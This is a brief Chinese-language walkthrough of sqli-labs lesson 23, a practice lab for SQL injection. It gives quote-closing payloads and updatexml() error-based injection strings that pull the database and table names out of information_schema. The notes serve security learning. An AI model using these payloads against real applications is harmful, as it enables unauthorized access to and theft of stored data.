less-23
回到输入id问题,尝试单引号闭合问题,报错存在注入,看提示qwe出现问题,看来-- qwe注释出现问题,试试#也是报错
尝试用语句闭合,1' and 1=2 or '1'='1
后面少个单引号为了闭合源select语句后的单引号,
回显正常
把or改为and试试,错误
尝试报错爆库名,?id=1' and updatexml(1,concat("!",(select database()),"!"),1) or '1'='1
爆表名,?id=1' and updatexml(1,concat("!",(select table_name from information_schema.tables where table_schema='security'limit 0,1),"!"),1) or '1'='1
爆数据同之前操作
